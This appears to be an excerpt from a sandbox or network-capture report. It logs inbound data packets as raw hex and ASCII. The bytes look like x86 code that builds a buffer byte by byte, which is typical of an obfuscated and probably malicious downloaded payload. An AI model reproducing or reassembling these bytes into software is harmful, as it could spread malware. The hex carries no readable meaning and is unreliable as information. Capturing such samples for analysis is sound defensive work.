2022-05-16 08:29:53 UTC	973	IN	Data Raw: f5 ff 33 c6 85 8d 1c f5 ff 75 c6 85 8e 1c f5 ff 59 c6 85 8f 1c f5 ff a4 c6 85 90 1c f5 ff 33 c6 85 91 1c f5 ff f5 c6 85 92 1c f5 ff fb c6 85 93 1c f5 ff c8 c6 85 94 1c f5 ff 47 c6 85 95 1c f5 ff dd c6 85 96 1c f5 ff 54 c6 85 97 1c f5 ff 60 c6 85 98 1c f5 ff 6a c6 85 99 1c f5 ff 24 c6 85 9a 1c f5 ff fc c6 85 9b 1c f5 ff 50 c6 85 9c 1c f5 ff 00 c6 85 9d 1c f5 ff ae c6 85 9e 1c f5 ff f8 c6 85 9f 1c f5 ff 0b c6 85 a0 1c f5 ff 6a c6 85 a1 1c f5 ff 45 c6 85 a2 1c f5 ff fc c6 85 a3 1c f5 ff 19 c6 85 a4 1c f5 ff 11 c6 85 a5 1c f5 ff cf c6 85 a6 1c f5 ff 67 c6 85 a7 1c f5 ff e5 c6 85 a8 1c f5 ff 69 c6 85 a9 1c f5 ff cb c6 85 aa 1c f5 ff cb c6 85 ab 1c f5 ff 5e c6 85 ac 1c f5 ff a5 c6 85 ad 1c f5 ff 8f c6 85 ae 1c f5 ff 38 c6 85 af 1c f5 ff fc c6 85 b0 1c f5 ff 9a Data Ascii: 3uY3GT`j$PjEgi^8
2022-05-16 08:29:53 UTC	989	IN	Data Raw: 85 b1 25 f5 ff 20 c6 85 b2 25 f5 ff b0 c6 85 b3 25 f5 ff a8 c6 85 b4 25 f5 ff 1e c6 85 b5 25 f5 ff bc c6 85 b6 25 f5 ff 33 c6 85 b7 25 f5 ff 7d c6 85 b8 25 f5 ff 39 c6 85 b9 25 f5 ff 77 c6 85 ba 25 f5 ff 79 c6 85 bb 25 f5 ff f8 c6 85 bc 25 f5 ff c2 c6 85 bd 25 f5 ff bd c6 85 be 25 f5 ff 39 c6 85 bf 25 f5 ff 57 c6 85 c0 25 f5 ff 93 c6 85 c1 25 f5 ff ce c6 85 c2 25 f5 ff 9e c6 85 c3 25 f5 ff ec c6 85 c4 25 f5 ff 54 c6 85 c5 25 f5 ff 46 c6 85 c6 25 f5 ff 47 c6 85 c7 25 f5 ff cf c6 85 c8 25 f5 ff c2 c6 85 c9 25 f5 ff 0a c6 85 ca 25 f5 ff 8e c6 85 cb 25 f5 ff 85 c6 85 cc 25 f5 ff 54 c6 85 cd 25 f5 ff 6c c6 85 ce 25 f5 ff 0b c6 85 cf 25 f5 ff 6d c6 85 d0 25 f5 ff 60 c6 85 d1 25 f5 ff 1c c6 85 d2 25 f5 ff 86 c6 85 d3 25 f5 ff 82 c6 85 d4 25 f5 ff 87 c6 85 d5 25 Data Ascii: % %%%%%3%}%9%w%y%%%%9%W%%%%%T%F%G%%%%%%T%l%%m%`%%%%%
2022-05-16 08:29:53 UTC	1005	IN	Data Raw: ff 5f c6 85 d6 2e f5 ff d3 c6 85 d7 2e f5 ff 65 c6 85 d8 2e f5 ff b8 c6 85 d9 2e f5 ff e1 c6 85 da 2e f5 ff f4 c6 85 db 2e f5 ff 60 c6 85 dc 2e f5 ff ce c6 85 dd 2e f5 ff 29 c6 85 de 2e f5 ff 64 c6 85 df 2e f5 ff 43 c6 85 e0 2e f5 ff 43 c6 85 e1 2e f5 ff cf c6 85 e2 2e f5 ff 5a c6 85 e3 2e f5 ff 7f c6 85 e4 2e f5 ff 35 c6 85 e5 2e f5 ff e4 c6 85 e6 2e f5 ff f8 c6 85 e7 2e f5 ff bc c6 85 e8 2e f5 ff a9 c6 85 e9 2e f5 ff d7 c6 85 ea 2e f5 ff 97 c6 85 eb 2e f5 ff 50 c6 85 ec 2e f5 ff e0 c6 85 ed 2e f5 ff 69 c6 85 ee 2e f5 ff f4 c6 85 ef 2e f5 ff 7d c6 85 f0 2e f5 ff 46 c6 85 f1 2e f5 ff 5f c6 85 f2 2e f5 ff 06 c6 85 f3 2e f5 ff 31 c6 85 f4 2e f5 ff 1f c6 85 f5 2e f5 ff 7f c6 85 f6 2e f5 ff 71 c6 85 f7 2e f5 ff b2 c6 85 f8 2e f5 ff 0f c6 85 f9 2e f5 ff 6d c6 Data Ascii: _..e....`..).d.C.C..Z..5.......P..i..}.F._..1...q...m
2022-05-16 08:29:53 UTC	1021	IN	Data Raw: fa 37 f5 ff 07 c6 85 fb 37 f5 ff 92 c6 85 fc 37 f5 ff ac c6 85 fd 37 f5 ff bd c6 85 fe 37 f5 ff 8b c6 85 ff 37 f5 ff 32 c6 85 00 38 f5 ff 59 c6 85 01 38 f5 ff 8d c6 85 02 38 f5 ff fd c6 85 03 38 f5 ff 21 c6 85 04 38 f5 ff fb c6 85 05 38 f5 ff 8c c6 85 06 38 f5 ff b5 c6 85 07 38 f5 ff 46 c6 85 08 38 f5 ff 1e c6 85 09 38 f5 ff bc c6 85 0a 38 f5 ff 47 c6 85 0b 38 f5 ff bb c6 85 0c 38 f5 ff 20 c6 85 0d 38 f5 ff c8 c6 85 0e 38 f5 ff 47 c6 85 0f 38 f5 ff 47 c6 85 10 38 f5 ff f8 c6 85 11 38 f5 ff 4c c6 85 12 38 f5 ff 46 c6 85 13 38 f5 ff d6 c6 85 14 38 f5 ff d6 c6 85 15 38 f5 ff 30 c6 85 16 38 f5 ff e1 c6 85 17 38 f5 ff 69 c6 85 18 38 f5 ff fb c6 85 19 38 f5 ff 91 c6 85 1a 38 f5 ff 3d c6 85 1b 38 f5 ff 10 c6 85 1c 38 f5 ff f8 c6 85 1d 38 f5 ff 0b c6 85 1e 38 f5 Data Ascii: 77777728Y888!8888F888G88 88G8G88L8F888088i888=8888
2022-05-16 08:29:53 UTC	1037	IN	Data Raw: 0b c6 85 1f 41 f5 ff 19 c6 85 20 41 f5 ff e8 c6 85 21 41 f5 ff e9 c6 85 22 41 f5 ff e2 c6 85 23 41 f5 ff 56 c6 85 24 41 f5 ff 0f c6 85 25 41 f5 ff 1b c6 85 26 41 f5 ff fc c6 85 27 41 f5 ff 97 c6 85 28 41 f5 ff 0a c6 85 29 41 f5 ff cf c6 85 2a 41 f5 ff a9 c6 85 2b 41 f5 ff 28 c6 85 2c 41 f5 ff 3d c6 85 2d 41 f5 ff 41 c6 85 2e 41 f5 ff 09 c6 85 2f 41 f5 ff 5a c6 85 30 41 f5 ff cf c6 85 31 41 f5 ff 06 c6 85 32 41 f5 ff 6a c6 85 33 41 f5 ff ce c6 85 34 41 f5 ff 6c c6 85 35 41 f5 ff ce c6 85 36 41 f5 ff 5a c6 85 37 41 f5 ff 0b c6 85 38 41 f5 ff 50 c6 85 39 41 f5 ff 33 c6 85 3a 41 f5 ff d9 c6 85 3b 41 f5 ff bc c6 85 3c 41 f5 ff a9 c6 85 3d 41 f5 ff 06 c6 85 3e 41 f5 ff db c6 85 3f 41 f5 ff 7d c6 85 40 41 f5 ff 19 c6 85 41 41 f5 ff 81 c6 85 42 41 f5 ff c6 c6 85 Data Ascii: A A!A"A#AV$A%A&A'A(A)A*A+A(,A=-AA.A/AZ0A1A2Aj3A4Al5A6AZ7A8AP9A3:A;A<A=A>A?A}@AAABA
2022-05-16 08:29:53 UTC	1053	IN	Data Raw: 4a f5 ff 0a c6 85 44 4a f5 ff 1e c6 85 45 4a f5 ff ff c6 85 46 4a f5 ff 9e c6 85 47 4a f5 ff b0 c6 85 48 4a f5 ff 7f c6 85 49 4a f5 ff 1f c6 85 4a 4a f5 ff f5 c6 85 4b 4a f5 ff 1e c6 85 4c 4a f5 ff 96 c6 85 4d 4a f5 ff f8 c6 85 4e 4a f5 ff f8 c6 85 4f 4a f5 ff 07 c6 85 50 4a f5 ff 49 c6 85 51 4a f5 ff bd c6 85 52 4a f5 ff 0b c6 85 53 4a f5 ff cf c6 85 54 4a f5 ff 59 c6 85 55 4a f5 ff 13 c6 85 56 4a f5 ff ed c6 85 57 4a f5 ff f1 c6 85 58 4a f5 ff a6 c6 85 59 4a f5 ff 2e c6 85 5a 4a f5 ff 75 c6 85 5b 4a f5 ff 5e c6 85 5c 4a f5 ff 6a c6 85 5d 4a f5 ff 0b c6 85 5e 4a f5 ff b0 c6 85 5f 4a f5 ff 61 c6 85 60 4a f5 ff 2e c6 85 61 4a f5 ff b9 c6 85 62 4a f5 ff 44 c6 85 63 4a f5 ff 50 c6 85 64 4a f5 ff 27 c6 85 65 4a f5 ff 44 c6 85 66 4a f5 ff 56 c6 85 67 4a f5 ff Data Ascii: JDJEJFJGJHJIJJJKJLJMJNJOJPJIQJRJSJTJYUJVJWJXJYJ.ZJu[J^\Jj]J^J_Ja`J.aJbJDcJPdJ'eJDfJVgJ
2022-05-16 08:29:53 UTC	1069	IN	Data Raw: c6 85 68 53 f5 ff 7d c6 85 69 53 f5 ff f5 c6 85 6a 53 f5 ff 44 c6 85 6b 53 f5 ff bb c6 85 6c 53 f5 ff 52 c6 85 6d 53 f5 ff 0c c6 85 6e 53 f5 ff 62 c6 85 6f 53 f5 ff c2 c6 85 70 53 f5 ff ba c6 85 71 53 f5 ff 1b c6 85 72 53 f5 ff 61 c6 85 73 53 f5 ff e2 c6 85 74 53 f5 ff 5a c6 85 75 53 f5 ff 1e c6 85 76 53 f5 ff 96 c6 85 77 53 f5 ff 8c c6 85 78 53 f5 ff 42 c6 85 79 53 f5 ff 6e c6 85 7a 53 f5 ff e0 c6 85 7b 53 f5 ff c6 c6 85 7c 53 f5 ff 80 c6 85 7d 53 f5 ff cf c6 85 7e 53 f5 ff a9 c6 85 7f 53 f5 ff 5a c6 85 80 53 f5 ff 33 c6 85 81 53 f5 ff 6c c6 85 82 53 f5 ff 80 c6 85 83 53 f5 ff 5a c6 85 84 53 f5 ff cf c6 85 85 53 f5 ff a9 c6 85 86 53 f5 ff b0 c6 85 87 53 f5 ff c8 c6 85 88 53 f5 ff 35 c6 85 89 53 f5 ff 40 c6 85 8a 53 f5 ff 5a c6 85 8b 53 f5 ff 0b c6 85 8c Data Ascii: hS}iSjSDkSlSRmSnSboSpSqSrSasStSZuSvSwSxSBySnzS{S\|S}S~SSZS3SlSSZSSSSS5S@SZS
2022-05-16 08:29:53 UTC	1085	IN	Data Raw: f5 ff 56 c6 85 8d 5c f5 ff 56 c6 85 8e 5c f5 ff 56 c6 85 8f 5c f5 ff ba c6 85 90 5c f5 ff a4 c6 85 91 5c f5 ff 95 c6 85 92 5c f5 ff 7f c6 85 93 5c f5 ff 5d c6 85 94 5c f5 ff e5 c6 85 95 5c f5 ff f3 c6 85 96 5c f5 ff cb c6 85 97 5c f5 ff 38 c6 85 98 5c f5 ff b4 c6 85 99 5c f5 ff 8b c6 85 9a 5c f5 ff 18 c6 85 9b 5c f5 ff 11 c6 85 9c 5c f5 ff 18 c6 85 9d 5c f5 ff 9a c6 85 9e 5c f5 ff 2c c6 85 9f 5c f5 ff ac c6 85 a0 5c f5 ff 91 c6 85 a1 5c f5 ff 8c c6 85 a2 5c f5 ff 42 c6 85 a3 5c f5 ff 6a c6 85 a4 5c f5 ff ea c6 85 a5 5c f5 ff 3b c6 85 a6 5c f5 ff e4 c6 85 a7 5c f5 ff 30 c6 85 a8 5c f5 ff 23 c6 85 a9 5c f5 ff ac c6 85 aa 5c f5 ff 7f c6 85 ab 5c f5 ff a4 c6 85 ac 5c f5 ff 08 c6 85 ad 5c f5 ff a4 c6 85 ae 5c f5 ff 30 c6 85 af 5c f5 ff 56 c6 85 b0 5c f5 ff e1 Data Ascii: V\V\V\\\\\]\\\\8\\\\\\\,\\\\B\j\\;\\0\#\\\\\\0\V\
2022-05-16 08:29:53 UTC	1101	IN	Data Raw: 85 b1 65 f5 ff 8d c6 85 b2 65 f5 ff 90 c6 85 b3 65 f5 ff b6 c6 85 b4 65 f5 ff 08 c6 85 b5 65 f5 ff c6 c6 85 b6 65 f5 ff 92 c6 85 b7 65 f5 ff 56 c6 85 b8 65 f5 ff 56 c6 85 b9 65 f5 ff 30 c6 85 ba 65 f5 ff 6a c6 85 bb 65 f5 ff fc c6 85 bc 65 f5 ff 2c c6 85 bd 65 f5 ff 46 c6 85 be 65 f5 ff 47 c6 85 bf 65 f5 ff cf c6 85 c0 65 f5 ff 84 c6 85 c1 65 f5 ff 36 c6 85 c2 65 f5 ff d1 c6 85 c3 65 f5 ff 89 c6 85 c4 65 f5 ff 61 c6 85 c5 65 f5 ff 46 c6 85 c6 65 f5 ff 0a c6 85 c7 65 f5 ff 6d c6 85 c8 65 f5 ff 5a c6 85 c9 65 f5 ff 6c c6 85 ca 65 f5 ff ec c6 85 cb 65 f5 ff 3b c6 85 cc 65 f5 ff f8 c6 85 cd 65 f5 ff 6d c6 85 ce 65 f5 ff 96 c6 85 cf 65 f5 ff 13 c6 85 d0 65 f5 ff 7f c6 85 d1 65 f5 ff bd c6 85 d2 65 f5 ff 82 c6 85 d3 65 f5 ff 5b c6 85 d4 65 f5 ff 47 c6 85 d5 65 Data Ascii: eeeeeeeVeVe0ejee,eFeGeee6eeeaeFeemeZelee;eemeeeeee[eGe
2022-05-16 08:29:53 UTC	1117	IN	Data Raw: ff 2e c6 85 d6 6e f5 ff ed c6 85 d7 6e f5 ff 22 c6 85 d8 6e f5 ff c4 c6 85 d9 6e f5 ff 2f c6 85 da 6e f5 ff 2e c6 85 db 6e f5 ff b9 c6 85 dc 6e f5 ff 5c c6 85 dd 6e f5 ff 3b c6 85 de 6e f5 ff 7e c6 85 df 6e f5 ff 4f c6 85 e0 6e f5 ff 30 c6 85 e1 6e f5 ff 29 c6 85 e2 6e f5 ff 40 c6 85 e3 6e f5 ff bb c6 85 e4 6e f5 ff b4 c6 85 e5 6e f5 ff 8d c6 85 e6 6e f5 ff 7f c6 85 e7 6e f5 ff fa c6 85 e8 6e f5 ff b4 c6 85 e9 6e f5 ff b3 c6 85 ea 6e f5 ff ef c6 85 eb 6e f5 ff a3 c6 85 ec 6e f5 ff 6a c6 85 ed 6e f5 ff 4d c6 85 ee 6e f5 ff 2c c6 85 ef 6e f5 ff 41 c6 85 f0 6e f5 ff 14 c6 85 f1 6e f5 ff 91 c6 85 f2 6e f5 ff e0 c6 85 f3 6e f5 ff 01 c6 85 f4 6e f5 ff e0 c6 85 f5 6e f5 ff 42 c6 85 f6 6e f5 ff e7 c6 85 f7 6e f5 ff 79 c6 85 f8 6e f5 ff 6c c6 85 f9 6e f5 ff c0 c6 Data Ascii: .nn"nn/n.nn\n;n~nOn0n)n@nnnnnnnnnnjnMn,nAnnnnnnBnnynln
2022-05-16 08:29:53 UTC	1133	IN	Data Raw: fa 77 f5 ff b8 c6 85 fb 77 f5 ff 96 c6 85 fc 77 f5 ff f8 c6 85 fd 77 f5 ff 2e c6 85 fe 77 f5 ff 7d c6 85 ff 77 f5 ff ae c6 85 00 78 f5 ff da c6 85 01 78 f5 ff 0e c6 85 02 78 f5 ff 90 c6 85 03 78 f5 ff 3f c6 85 04 78 f5 ff 27 c6 85 05 78 f5 ff 45 c6 85 06 78 f5 ff b8 c6 85 07 78 f5 ff b8 c6 85 08 78 f5 ff 07 c6 85 09 78 f5 ff c8 c6 85 0a 78 f5 ff 03 c6 85 0b 78 f5 ff 76 c6 85 0c 78 f5 ff 55 c6 85 0d 78 f5 ff 65 c6 85 0e 78 f5 ff c9 c6 85 0f 78 f5 ff e2 c6 85 10 78 f5 ff b1 c6 85 11 78 f5 ff 9c c6 85 12 78 f5 ff ab c6 85 13 78 f5 ff 75 c6 85 14 78 f5 ff 2b c6 85 15 78 f5 ff 7d c6 85 16 78 f5 ff b4 c6 85 17 78 f5 ff f0 c6 85 18 78 f5 ff 7d c6 85 19 78 f5 ff d7 c6 85 1a 78 f5 ff 00 c6 85 1b 78 f5 ff 19 c6 85 1c 78 f5 ff e8 c6 85 1d 78 f5 ff 15 c6 85 1e 78 f5 Data Ascii: wwww.w}wxxxx?x'xExxxxxxvxUxexxxxxxux+x}xxx}xxxxxx
2022-05-16 08:29:53 UTC	1149	IN	Data Raw: 69 c6 85 1f 81 f5 ff c3 c6 85 20 81 f5 ff a9 c6 85 21 81 f5 ff f3 c6 85 22 81 f5 ff 9a c6 85 23 81 f5 ff 69 c6 85 24 81 f5 ff 74 c6 85 25 81 f5 ff 2d c6 85 26 81 f5 ff 38 c6 85 27 81 f5 ff 69 c6 85 28 81 f5 ff 65 c6 85 29 81 f5 ff dd c6 85 2a 81 f5 ff 0d c6 85 2b 81 f5 ff c0 c6 85 2c 81 f5 ff 54 c6 85 2d 81 f5 ff 48 c6 85 2e 81 f5 ff f3 c6 85 2f 81 f5 ff a3 c6 85 30 81 f5 ff 33 c6 85 31 81 f5 ff fd c6 85 32 81 f5 ff 0b c6 85 33 81 f5 ff c8 c6 85 34 81 f5 ff 5e c6 85 35 81 f5 ff dd c6 85 36 81 f5 ff 06 c6 85 37 81 f5 ff 34 c6 85 38 81 f5 ff 62 c6 85 39 81 f5 ff 8b c6 85 3a 81 f5 ff f4 c6 85 3b 81 f5 ff 31 c6 85 3c 81 f5 ff f5 c6 85 3d 81 f5 ff c0 c6 85 3e 81 f5 ff 8e c6 85 3f 81 f5 ff a1 c6 85 40 81 f5 ff 15 c6 85 41 81 f5 ff 8b c6 85 42 81 f5 ff b9 c6 85 Data Ascii: i !"#i$t%-&8'i(e)*+,T-H./031234^56748b9:;1<=>?@AB
2022-05-16 08:29:53 UTC	1165	IN	Data Raw: 8a f5 ff 09 c6 85 44 8a f5 ff d9 c6 85 45 8a f5 ff e1 c6 85 46 8a f5 ff f8 c6 85 47 8a f5 ff 6d c6 85 48 8a f5 ff e0 c6 85 49 8a f5 ff c6 c6 85 4a 8a f5 ff 50 c6 85 4b 8a f5 ff ce c6 85 4c 8a f5 ff a9 c6 85 4d 8a f5 ff 5a c6 85 4e 8a f5 ff 33 c6 85 4f 8a f5 ff 74 c6 85 50 8a f5 ff 04 c6 85 51 8a f5 ff 5b c6 85 52 8a f5 ff cf c6 85 53 8a f5 ff a9 c6 85 54 8a f5 ff 62 c6 85 55 8a f5 ff 81 c6 85 56 8a f5 ff 88 c6 85 57 8a f5 ff b9 c6 85 58 8a f5 ff 30 c6 85 59 8a f5 ff 4c c6 85 5a 8a f5 ff 46 c6 85 5b 8a f5 ff 47 c6 85 5c 8a f5 ff f8 c6 85 5d 8a f5 ff ce c6 85 5e 8a f5 ff d3 c6 85 5f 8a f5 ff 6a c6 85 60 8a f5 ff a8 c6 85 61 8a f5 ff cf c6 85 62 8a f5 ff 1e c6 85 63 8a f5 ff 39 c6 85 64 8a f5 ff 7f c6 85 65 8a f5 ff 35 c6 85 66 8a f5 ff 00 c6 85 67 8a f5 ff Data Ascii: DEFGmHIJPKLMZN3OtPQ[RSTbUVWX0YLZF[G\]^_j`abc9de5fg
2022-05-16 08:29:53 UTC	1181	IN	Data Raw: c6 85 68 93 f5 ff e8 c6 85 69 93 f5 ff 1f c6 85 6a 93 f5 ff 0b c6 85 6b 93 f5 ff 6d c6 85 6c 93 f5 ff 2e c6 85 6d 93 f5 ff ac c6 85 6e 93 f5 ff 91 c6 85 6f 93 f5 ff 84 c6 85 70 93 f5 ff c6 c6 85 71 93 f5 ff b2 c6 85 72 93 f5 ff 81 c6 85 73 93 f5 ff 72 c6 85 74 93 f5 ff 79 c6 85 75 93 f5 ff cf c6 85 76 93 f5 ff a9 c6 85 77 93 f5 ff 2e c6 85 78 93 f5 ff fd c6 85 79 93 f5 ff 19 c6 85 7a 93 f5 ff 77 c6 85 7b 93 f5 ff 65 c6 85 7c 93 f5 ff 10 c6 85 7d 93 f5 ff df c6 85 7e 93 f5 ff a4 c6 85 7f 93 f5 ff b7 c6 85 80 93 f5 ff 33 c6 85 81 93 f5 ff 7d c6 85 82 93 f5 ff 5d c6 85 83 93 f5 ff 77 c6 85 84 93 f5 ff 79 c6 85 85 93 f5 ff b4 c6 85 86 93 f5 ff 56 c6 85 87 93 f5 ff ab c6 85 88 93 f5 ff ea c6 85 89 93 f5 ff 49 c6 85 8a 93 f5 ff 56 c6 85 8b 93 f5 ff 30 c6 85 8c Data Ascii: hijkml.mnopqrsrtyuvw.xyzw{e\|}~3}]wyVIV0
2022-05-16 08:29:53 UTC	1197	IN	Data Raw: f5 ff 04 c6 85 8d 9c f5 ff bb c6 85 8e 9c f5 ff 4a c6 85 8f 9c f5 ff 08 c6 85 90 9c f5 ff 62 c6 85 91 9c f5 ff c1 c6 85 92 9c f5 ff d8 c6 85 93 9c f5 ff 7a c6 85 94 9c f5 ff d4 c6 85 95 9c f5 ff 10 c6 85 96 9c f5 ff 5a c6 85 97 9c f5 ff 1e c6 85 98 9c f5 ff e2 c6 85 99 9c f5 ff f7 c6 85 9a 9c f5 ff 8c c6 85 9b 9c f5 ff df c6 85 9c 9c f5 ff 95 c6 85 9d 9c f5 ff c0 c6 85 9e 9c f5 ff 35 c6 85 9f 9c f5 ff 1c c6 85 a0 9c f5 ff be c6 85 a1 9c f5 ff d6 c6 85 a2 9c f5 ff 59 c6 85 a3 9c f5 ff 1e c6 85 a4 9c f5 ff 0b c6 85 a5 9c f5 ff a6 c6 85 a6 9c f5 ff c0 c6 85 a7 9c f5 ff 6f c6 85 a8 9c f5 ff 94 c6 85 a9 9c f5 ff bb c6 85 aa 9c f5 ff cc c6 85 ab 9c f5 ff 27 c6 85 ac 9c f5 ff cd c6 85 ad 9c f5 ff e6 c6 85 ae 9c f5 ff a6 c6 85 af 9c f5 ff b8 c6 85 b0 9c f5 ff 07 Data Ascii: JbzZ5Yo'
2022-05-16 08:29:53 UTC	1213	IN	Data Raw: 85 b1 a5 f5 ff 3e c6 85 b2 a5 f5 ff e1 c6 85 b3 a5 f5 ff 69 c6 85 b4 a5 f5 ff f4 c6 85 b5 a5 f5 ff 51 c6 85 b6 a5 f5 ff ea c6 85 b7 a5 f5 ff 33 c6 85 b8 a5 f5 ff 07 c6 85 b9 a5 f5 ff f4 c6 85 ba a5 f5 ff 6a c6 85 bb a5 f5 ff 85 c6 85 bc a5 f5 ff 9c c6 85 bd a5 f5 ff 6d c6 85 be a5 f5 ff 0b c6 85 bf a5 f5 ff 6d c6 85 c0 a5 f5 ff 62 c6 85 c1 a5 f5 ff a1 c6 85 c2 a5 f5 ff 2d c6 85 c3 a5 f5 ff 1f c6 85 c4 a5 f5 ff 2f c6 85 c5 a5 f5 ff d6 c6 85 c6 a5 f5 ff 69 c6 85 c7 a5 f5 ff fb c6 85 c8 a5 f5 ff fa c6 85 c9 a5 f5 ff 30 c6 85 ca a5 f5 ff 56 c6 85 cb a5 f5 ff a5 c6 85 cc a5 f5 ff 51 c6 85 cd a5 f5 ff da c6 85 ce a5 f5 ff f7 c6 85 cf a5 f5 ff a5 c6 85 d0 a5 f5 ff 30 c6 85 d1 a5 f5 ff dd c6 85 d2 a5 f5 ff 6c c6 85 d3 a5 f5 ff 2b c6 85 d4 a5 f5 ff 47 c6 85 d5 a5 Data Ascii: >iQ3jmmb-/i0VQ0l+G
2022-05-16 08:29:53 UTC	1229	IN	Data Raw: ff fd c6 85 d6 ae f5 ff fb c6 85 d7 ae f5 ff c8 c6 85 d8 ae f5 ff 1b c6 85 d9 ae f5 ff aa c6 85 da ae f5 ff dd c6 85 db ae f5 ff 65 c6 85 dc ae f5 ff 1d c6 85 dd ae f5 ff e2 c6 85 de ae f5 ff b5 c6 85 df ae f5 ff bc c6 85 e0 ae f5 ff 93 c6 85 e1 ae f5 ff 32 c6 85 e2 ae f5 ff c6 c6 85 e3 ae f5 ff 0c c6 85 e4 ae f5 ff e5 c6 85 e5 ae f5 ff 8b c6 85 e6 ae f5 ff 11 c6 85 e7 ae f5 ff cf c6 85 e8 ae f5 ff 37 c6 85 e9 ae f5 ff 5e c6 85 ea ae f5 ff 69 c6 85 eb ae f5 ff 2d c6 85 ec ae f5 ff a5 c6 85 ed ae f5 ff cb c6 85 ee ae f5 ff cb c6 85 ef ae f5 ff 5e c6 85 f0 ae f5 ff a5 c6 85 f1 ae f5 ff 8f c6 85 f2 ae f5 ff 38 c6 85 f3 ae f5 ff fc c6 85 f4 ae f5 ff 9a c6 85 f5 ae f5 ff 69 c6 85 f6 ae f5 ff 74 c6 85 f7 ae f5 ff 2d c6 85 f8 ae f5 ff a1 c6 85 f9 ae f5 ff 2e c6 Data Ascii: e27^i-^8it-.
2022-05-16 08:29:53 UTC	1245	IN	Data Raw: fa b7 f5 ff ed c6 85 fb b7 f5 ff bb c6 85 fc b7 f5 ff 49 c6 85 fd b7 f5 ff 1f c6 85 fe b7 f5 ff b5 c6 85 ff b7 f5 ff 47 c6 85 00 b8 f5 ff 72 c6 85 01 b8 f5 ff 4b c6 85 02 b8 f5 ff be c6 85 03 b8 f5 ff a8 c6 85 04 b8 f5 ff 93 c6 85 05 b8 f5 ff 30 c6 85 06 b8 f5 ff e1 c6 85 07 b8 f5 ff 30 c6 85 08 b8 f5 ff 71 c6 85 09 b8 f5 ff 78 c6 85 0a b8 f5 ff cc c6 85 0b b8 f5 ff 3f c6 85 0c b8 f5 ff f8 c6 85 0d b8 f5 ff 81 c6 85 0e b8 f5 ff e9 c6 85 0f b8 f5 ff e8 c6 85 10 b8 f5 ff c4 c6 85 11 b8 f5 ff d9 c6 85 12 b8 f5 ff f4 c6 85 13 b8 f5 ff 92 c6 85 14 b8 f5 ff fc c6 85 15 b8 f5 ff 64 c6 85 16 b8 f5 ff a9 c6 85 17 b8 f5 ff 73 c6 85 18 b8 f5 ff e1 c6 85 19 b8 f5 ff cf c6 85 1a b8 f5 ff aa c6 85 1b b8 f5 ff c0 c6 85 1c b8 f5 ff 89 c6 85 1d b8 f5 ff 38 c6 85 1e b8 f5 Data Ascii: IGrK00qx?ds8
2022-05-16 08:29:53 UTC	1261	IN	Data Raw: 7d c6 85 1f c1 f5 ff a8 c6 85 20 c1 f5 ff 94 c6 85 21 c1 f5 ff 37 c6 85 22 c1 f5 ff ad c6 85 23 c1 f5 ff 43 c6 85 24 c1 f5 ff 4f c6 85 25 c1 f5 ff e1 c6 85 26 c1 f5 ff fa c6 85 27 c1 f5 ff 7d c6 85 28 c1 f5 ff b5 c6 85 29 c1 f5 ff 18 c6 85 2a c1 f5 ff 66 c6 85 2b c1 f5 ff 0f c6 85 2c c1 f5 ff 56 c6 85 2d c1 f5 ff 08 c6 85 2e c1 f5 ff 95 c6 85 2f c1 f5 ff 03 c6 85 30 c1 f5 ff 21 c6 85 31 c1 f5 ff aa c6 85 32 c1 f5 ff c7 c6 85 33 c1 f5 ff 78 c6 85 34 c1 f5 ff f8 c6 85 35 c1 f5 ff f3 c6 85 36 c1 f5 ff bf c6 85 37 c1 f5 ff f4 c6 85 38 c1 f5 ff a1 c6 85 39 c1 f5 ff 00 c6 85 3a c1 f5 ff f4 c6 85 3b c1 f5 ff 51 c6 85 3c c1 f5 ff 9c c6 85 3d c1 f5 ff 42 c6 85 3e c1 f5 ff d5 c6 85 3f c1 f5 ff ad c6 85 40 c1 f5 ff 69 c6 85 41 c1 f5 ff f8 c6 85 42 c1 f5 ff 12 c6 85 Data Ascii: } !7"#C$O%&'}()*f+,V-./0!123x456789:;Q<=B>?@iAB
2022-05-16 08:29:53 UTC	1277	IN	Data Raw: ca f5 ff 3f c6 85 44 ca f5 ff c9 c6 85 45 ca f5 ff 65 c6 85 46 ca f5 ff 35 c6 85 47 ca f5 ff ed c6 85 48 ca f5 ff b1 c6 85 49 ca f5 ff 5a c6 85 4a ca f5 ff cf c6 85 4b ca f5 ff a9 c6 85 4c ca f5 ff 1e c6 85 4d ca f5 ff c6 c6 85 4e ca f5 ff 71 c6 85 4f ca f5 ff 3f c6 85 50 ca f5 ff 20 c6 85 51 ca f5 ff 10 c6 85 52 ca f5 ff bc c6 85 53 ca f5 ff b8 c6 85 54 ca f5 ff 07 c6 85 55 ca f5 ff 4c c6 85 56 ca f5 ff e0 c6 85 57 ca f5 ff 18 c6 85 58 ca f5 ff 4c c6 85 59 ca f5 ff 3f c6 85 5a ca f5 ff 57 c6 85 5b ca f5 ff 2b c6 85 5c ca f5 ff ee c6 85 5d ca f5 ff 93 c6 85 5e ca f5 ff 70 c6 85 5f ca f5 ff 44 c6 85 60 ca f5 ff 09 c6 85 61 ca f5 ff c7 c6 85 62 ca f5 ff 21 c6 85 63 ca f5 ff 85 c6 85 64 ca f5 ff 3d c6 85 65 ca f5 ff 9d c6 85 66 ca f5 ff 6b c6 85 67 ca f5 ff Data Ascii: ?DEeF5GHIZJKLMNqO?P QRSTULVWXLY?ZW[+\]^p_D`ab!cd=efkg
2022-05-16 08:29:53 UTC	1293	IN	Data Raw: c6 85 68 d3 f5 ff b1 c6 85 69 d3 f5 ff 5a c6 85 6a d3 f5 ff 66 c6 85 6b d3 f5 ff f5 c6 85 6c d3 f5 ff b6 c6 85 6d d3 f5 ff d2 c6 85 6e d3 f5 ff 7d c6 85 6f d3 f5 ff 6d c6 85 70 d3 f5 ff cc c6 85 71 d3 f5 ff ef c6 85 72 d3 f5 ff c7 c6 85 73 d3 f5 ff 65 c6 85 74 d3 f5 ff b5 c6 85 75 d3 f5 ff 9f c6 85 76 d3 f5 ff ee c6 85 77 d3 f5 ff dc c6 85 78 d3 f5 ff 78 c6 85 79 d3 f5 ff bd c6 85 7a d3 f5 ff a9 c6 85 7b d3 f5 ff b1 c6 85 7c d3 f5 ff 47 c6 85 7d d3 f5 ff 47 c6 85 7e d3 f5 ff f8 c6 85 7f d3 f5 ff bc c6 85 80 d3 f5 ff d3 c6 85 81 d3 f5 ff 9f c6 85 82 d3 f5 ff 59 c6 85 83 d3 f5 ff b5 c6 85 84 d3 f5 ff 50 c6 85 85 d3 f5 ff 92 c6 85 86 d3 f5 ff 0b c6 85 87 d3 f5 ff 47 c6 85 88 d3 f5 ff b7 c6 85 89 d3 f5 ff 86 c6 85 8a d3 f5 ff 49 c6 85 8b d3 f5 